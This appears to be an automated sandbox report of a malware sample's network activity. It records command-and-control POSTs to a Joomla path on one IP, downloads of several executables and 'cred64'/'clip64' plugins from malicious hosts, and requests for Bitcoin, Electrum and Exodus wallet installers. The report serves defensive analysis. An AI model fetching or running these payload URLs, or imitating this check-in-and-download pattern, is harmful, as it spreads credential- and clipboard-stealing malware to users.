Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 104.18.19.218 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 172.67.160.221 | Active | Moloch |
| 172.67.40.154 | Active | Moloch |
| 176.113.115.145 | Active | Moloch |
| 185.246.221.126 | Active | Moloch |
| 193.233.20.36 | Active | Moloch |
| 199.115.193.116 | Active | Moloch |
| 212.87.204.93 | Active | Moloch |
| 66.42.108.195 | Active | Moloch |
| 45.33.6.223 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| bitcoin.org | 172.67.40.154 | |
| download.electrum.org | 104.21.89.144 | |
| downloads.exodus.com | 104.18.18.218 |
- TCP Requests
-
-
192.168.56.103:49195 104.18.19.218:443downloads.exodus.com
-
192.168.56.103:49196 104.18.19.218:443downloads.exodus.com
-
192.168.56.103:49197 104.18.19.218:443downloads.exodus.com
-
192.168.56.103:49199 172.67.160.221:443download.electrum.org
-
192.168.56.103:49194 172.67.40.154:443bitcoin.org
-
192.168.56.103:49170 176.113.115.145:4125
-
192.168.56.103:49190 185.246.221.126:80
-
192.168.56.103:49182 193.233.20.36:80
-
192.168.56.103:49188 199.115.193.116:11300
-
212.87.204.93:8081 192.168.56.103:49192
-
192.168.56.103:49184 66.42.108.195:40499
-
GET
200
https://bitcoin.org/bin/bitcoin-core-22.0/bitcoin-22.0-win64-setup.exe
REQUEST
RESPONSE
BODY
GET /bin/bitcoin-core-22.0/bitcoin-22.0-win64-setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: bitcoin.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 07:32:32 GMT
Content-Type: application/octet-stream
Content-Length: 18575512
Connection: keep-alive
Last-Modified: Sat, 13 Nov 2021 12:30:51 GMT
ETag: "618faffb-11b7098"
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: script-src 'self' www.google-analytics.com blockchain.info 'unsafe-inline'
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7afea8c37f4f835b-KIX
GET
200
https://download.electrum.org/4.3.4/electrum-4.3.4-setup.exe
REQUEST
RESPONSE
BODY
GET /4.3.4/electrum-4.3.4-setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: download.electrum.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 07:32:33 GMT
Content-Type: application/x-msdos-program
Content-Length: 33469816
Connection: keep-alive
Last-Modified: Thu, 26 Jan 2023 21:25:12 GMT
ETag: "1feb578-5f33162515e00"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 12105
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BqDHkVbe1Kek8WO6pXFEnWaDnisf7BRPyqwtkvUAQ5oBlE8Aw%2BDFomAsPiZtwayCeuHXOyH3fPMrG1jRqgHUjwr4wUxQHAL603QH6EKH%2F5GvIRda4TDe%2FQNHK%2B4q%2BLpKO5W%2FuBzVId4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 7afea8caedb18351-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://193.233.20.36/lend/123dsss.exe
REQUEST
RESPONSE
BODY
GET /lend/123dsss.exe HTTP/1.1
Host: 193.233.20.36
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Wed, 29 Mar 2023 15:16:11 GMT
Connection: keep-alive
ETag: "6424563b-2bc00"
Accept-Ranges: bytes
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://193.233.20.36/lend/Tarlatan.exe
REQUEST
RESPONSE
BODY
GET /lend/Tarlatan.exe HTTP/1.1
Host: 193.233.20.36
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:16 GMT
Content-Type: application/octet-stream
Content-Length: 919040
Last-Modified: Wed, 29 Mar 2023 15:15:52 GMT
Connection: keep-alive
ETag: "64245628-e0600"
Accept-Ranges: bytes
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://193.233.20.36/lend/Gmeyad.exe
REQUEST
RESPONSE
BODY
GET /lend/Gmeyad.exe HTTP/1.1
Host: 193.233.20.36
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:19 GMT
Content-Type: application/octet-stream
Content-Length: 4070496
Last-Modified: Wed, 29 Mar 2023 15:31:22 GMT
Connection: keep-alive
ETag: "642459ca-3e1c60"
Accept-Ranges: bytes
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://185.246.221.126/bins/2023.exe.exe
REQUEST
RESPONSE
BODY
GET /bins/2023.exe.exe HTTP/1.1
Host: 185.246.221.126
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 07:32:24 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 26 Mar 2023 19:36:05 GMT
ETag: "313d0a-5f7d2bcb93340"
Accept-Ranges: bytes
Content-Length: 3226890
Content-Type: application/x-msdos-program
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://185.246.221.126/bins/w.exe
REQUEST
RESPONSE
BODY
GET /bins/w.exe HTTP/1.1
Host: 185.246.221.126
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 07:32:30 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 28 Mar 2023 21:56:36 GMT
ETag: "4000-5f7fceeeecd00"
Accept-Ranges: bytes
Content-Length: 16384
Content-Type: application/x-msdos-program
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://193.233.20.36/lend/tmpBEB8.tmp.exe
REQUEST
RESPONSE
BODY
GET /lend/tmpBEB8.tmp.exe HTTP/1.1
Host: 193.233.20.36
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:31 GMT
Content-Type: application/octet-stream
Content-Length: 36864
Last-Modified: Wed, 29 Mar 2023 22:24:12 GMT
Connection: keep-alive
ETag: "6424ba8c-9000"
Accept-Ranges: bytes
POST
200
http://193.233.20.36/joomla/index.php
REQUEST
RESPONSE
BODY
POST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.20.36
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:32:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
404
http://193.233.20.36/joomla/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /joomla/Plugins/cred64.dll HTTP/1.1
Host: 193.233.20.36
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:33:03 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET
200
http://193.233.20.36/joomla/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /joomla/Plugins/clip64.dll HTTP/1.1
Host: 193.233.20.36
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 30 Mar 2023 07:33:03 GMT
Content-Type: application/octet-stream
Content-Length: 91136
Last-Modified: Wed, 29 Mar 2023 14:39:50 GMT
Connection: keep-alive
ETag: "64244db6-16400"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49199 172.67.160.221:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.electrum.org | 76:1b:7b:1a:b2:a7:3f:c5:99:a7:2b:68:f5:fd:1b:a5:5e:97:4b:65 |
|
TLSv1 192.168.56.103:49194 172.67.40.154:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.bitcoin.org | 1a:81:c6:0e:51:52:81:af:8a:1f:a8:fe:a3:18:04:fa:db:01:f5:3c |
Snort Alerts
No Snort Alerts